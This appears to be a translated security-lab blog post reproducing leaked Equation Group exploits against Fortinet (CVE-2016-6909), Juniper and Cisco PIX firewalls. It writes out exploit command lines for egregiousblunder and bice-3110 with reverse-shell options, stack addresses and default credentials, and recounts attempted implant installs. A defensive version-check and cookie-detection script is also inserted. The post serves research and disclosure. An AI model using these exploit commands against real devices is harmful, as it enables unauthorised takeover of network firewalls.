Analysis of the NSA tool leak

Posted by tzul at 2020-03-19

*The original author of this article is tigerlab. This article belongs to the FreeBuf original award program and may not be reproduced without permission.

On August 16, 2016, the hacker group "The Shadow Brokers" claimed to have compromised the "Equation Group" and leaked to the Internet part of the hacking tools they had obtained from that group's computer systems.

Tiger Lab promptly conducted an in-depth analysis of the leaked files. Most of the vulnerability verification and analysis has already been shared by peers, so here we share our verification and analysis of three other vulnerabilities that have not yet been analyzed, covering Fortinet, Juniper and Cisco.

1. Fortinet vulnerability verification

This vulnerability is a buffer overflow in the cookie parser, which allows a remote attacker to execute arbitrary code by sending a crafted HTTP request.

CVE number: CVE-2016-6909

The following versions are affected:

FortiOS 4.1.x before 4.1.11,

FortiOS 4.2.x before 4.2.13,

FortiOS 4.3.x before 4.3.9,

FortiSwitch before 3.4.3.
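Two checks a defender would want from the two points above (the affected-version ranges, and the fact that the bug lives in the cookie parser): a version comparator against the advisory's ranges, and a detection heuristic that flags abnormally long cookie values in captured HTTP requests to the device's web interface. This is an added example written for this article, not code from the original post or from Fortinet; the cookie-length threshold, the sample requests and the hostname are constructed assumptions.

```python
import re
from typing import List, Tuple

# Affected branches as listed in the advisory: (major, minor) -> first fixed patch level.
AFFECTED_FORTIOS = {
    (4, 1): 11,   # 4.1.x before 4.1.11
    (4, 2): 13,   # 4.2.x before 4.2.13
    (4, 3): 9,    # 4.3.x before 4.3.9
}
FORTISWITCH_FIXED = (3, 4, 3)   # FortiSwitch before 3.4.3

# Assumed alerting threshold for a single cookie value; tune for your environment.
COOKIE_LIMIT = 256


def parse_version(v: str) -> Tuple[int, int, int]:
    """Turn a dotted version string such as '4.2.12' into a comparable tuple."""
    m = re.fullmatch(r"v?(\d+)\.(\d+)\.(\d+)", v.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {v!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def fortios_affected(version: str) -> bool:
    """True if a FortiOS version falls inside one of the advisory's affected ranges."""
    major, minor, patch = parse_version(version)
    fixed = AFFECTED_FORTIOS.get((major, minor))
    if fixed is None:
        return False   # branch not listed in the advisory
    return patch < fixed


def fortiswitch_affected(version: str) -> bool:
    """True if a FortiSwitch version is below the first fixed release."""
    return parse_version(version) < FORTISWITCH_FIXED


def oversized_cookies(raw_request: str, limit: int = COOKIE_LIMIT) -> List[Tuple[str, int]]:
    """Return (cookie_name, value_length) for every cookie in the request's
    Cookie header whose value is longer than `limit`.  A cookie-parser overflow
    is triggered by an over-long value, so this is the signal worth alerting on."""
    findings = []
    for line in raw_request.split("\r\n"):
        if not line.lower().startswith("cookie:"):
            continue
        for part in line.split(":", 1)[1].split(";"):
            name, _, value = part.strip().partition("=")
            if len(value) > limit:
                findings.append((name, len(value)))
    return findings


# Constructed sample requests (not captured traffic) for trying the detector.
BENIGN_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: fw.example.internal\r\n"
    "Cookie: APSCOOKIE_=0&0\r\n\r\n"
)
SUSPECT_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: fw.example.internal\r\n"
    "Cookie: APSCOOKIE_=" + "A" * 600 + "\r\n\r\n"
)

if __name__ == "__main__":
    for v in ("4.1.10", "4.1.11", "4.2.12", "4.3.9", "5.0.0"):
        print(f"FortiOS {v}: affected={fortios_affected(v)}")
    print("benign :", oversized_cookies(BENIGN_REQUEST))
    print("suspect:", oversized_cookies(SUSPECT_REQUEST))
```

The version check answers "is this device in scope" from an inventory export; the cookie check is meant to run over request captures or reverse-proxy logs in front of the management interface, where a value hundreds of bytes long for a session cookie that is normally a few characters is the anomaly to investigate.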

The vulnerability verification process is as follows:

Obtain the target's ETag and determine the version type:

curl -X HEAD -v

curl -X HEAD -v



If the ETag is less than 4dxxxxxx, the device is version 3.x;

If the ETag is greater than 4dxxxxxx, determine whether a cookienum is required:

curl -X HEAD -v

APSCOOKIE=0&0: the cookienum does not need to be set when executing the command.


APSCOOKIE_=0&0: the cookienum needs to be set when executing the command, and the version is 4Nc.


Test case: ETag less than 4dxxxxxx, and no cookienum.

1) Obtain the overflow address

Check whether the ETag already exists in the configuration file EGBL.config, for example:


If it does not exist, the stack address can be obtained with the following command:

./egregiousblunder_3.0.0.1 -t 80 -l 5432 --ssl 0 -v --config ./EGBL.config --wam 10

This command only applies when the ETag is less than 4dxxxxxx and there is no cookienum; for other versions it is invalid and cannot obtain the stack address.

The command is executed as follows:


The stack address 0xbffff274 was obtained successfully.

2) Execute the shellcode and get a reverse shell

The shell can be bounced back by passing in the stack address directly:

./egregiousblunder_3.0.0.1 -t -p 80 -l 5432 --ssl 0 -v --stack 0xbffff274  --nopen --gen 3

Alternatively, write the ETag and stack address to the configuration file:

ETAG = 480d772a : 0xbffff274

./egregiousblunder_3.0.0.1 -t -p 80 -l 5432 --ssl 0 -v --etag 480d772a --nopen --gen 3 --config ./EGBL.config


The shell was returned successfully; executing the -ls command lists the directory contents.

This test mainly used lower-version Fortinet devices, whose ETag is less than 4dxxxxxx. Because the exploit's overflow process was not analyzed in depth, for other versions where the stack address cannot be obtained with the command, we tested by traversing memory addresses in the configuration file, and the shell could still be bounced back successfully.

2. Juniper vulnerability verification

This exploit first requires the Juniper device password; it then attacks according to the device version and model to obtain system privileges.

Log in via Telnet to obtain the device version information:


The device version is ssg5ssg20.6.1.0r2.0. Check whether the corresponding device file exists in the dats directory:


Vulnerability reproduction

BICE-3110 in the BARGLEE folder is the Juniper exploit tool:

./bice-3110 -R *.*.*.*                   // target IP
-D                                       // IP of the host receiving the reverse shell
-D 5555                                  // port of the host receiving the reverse shell
-M telnet                                // login mode: SSH / telnet
-T ../../dats/ssg5ssg20.6.1.0r2.0.XML    // attack code configuration
-U NetScreen                             // device account
-P NetScreen                             // device password

On success, the basic information of the device is returned. Two kinds of shell can be chosen: the Juniper interactive shell and the BI shell.


The interactive console is simply the command interface you get after logging in to the Juniper device via telnet.


BI shell


Six options can be executed:

Return to target status

Uninstall BARGLEE

Install BARGLEE

Read memory

Write memory

Command execution

Following the installation instructions in barrice.txt under the script directory, we tried to implant BARGLEE:


We tried the bin file type many times, but the implant was never installed successfully, so it could not be analyzed in depth.


3. Cisco EPBA vulnerability verification

As with Juniper, this exploit requires the device password first, and then obtains system privileges through an overflow attack.

Vulnerability reproduction



The result received is "MTU - EPBA: OK, payload: OK", indicating that the overflow succeeded.

At the same time, the console of the PIX 722 firewall shows a buffer overflow:


Next, we run the script "bridge-1120" as the operation prompt instructs. Executing option "1" checks whether the connection is normal; if the connection succeeds, the session D-H key is returned.


After executing option "8", the shell functions of Brice can be viewed.


Multiple attempts to write bananaglee reported that the version is not correct and it cannot be written.


We found that the version number is obtained by reading the first four bytes of the target file. We tried every file in the folder, but the search did not find a suitable implant.


This article has shared the verification ideas and process for three vulnerability exploitation files: Fortinet, Juniper and Cisco. During the analysis we carried out many test experiments to restore the whole attack process as far as possible, but because some key files are missing we could not complete the analysis. Readers who have better analytical ideas are welcome to get in touch and discuss.
